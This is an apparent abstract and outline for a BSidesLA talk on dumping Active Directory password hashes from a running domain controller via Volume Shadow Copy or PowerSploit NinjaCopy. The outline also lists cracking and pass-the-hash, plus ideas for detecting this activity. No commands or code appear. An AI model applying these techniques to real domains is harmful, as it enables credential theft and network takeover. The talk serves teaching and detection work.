BSidesLA talk where I explore methods of dumping active directory password hashes from a domain controller by using the Volume Shadow Copy Service or direct disk access to make a copy of the NTDS.dit, SYSTEM and SAM files from a running DC.

I give a history of old methods and detail new methods and ideas for detecting them.

  • evolution of getting password hashes
  • non-injection methods
  • getting your tools onto the dc
  • vss & psh
  • volume shadow copy service
  • powersploit ninjacopy direct disk access
  • export and extract
  • crack them
  • pass them
  • detect vssown / ninjacopy activity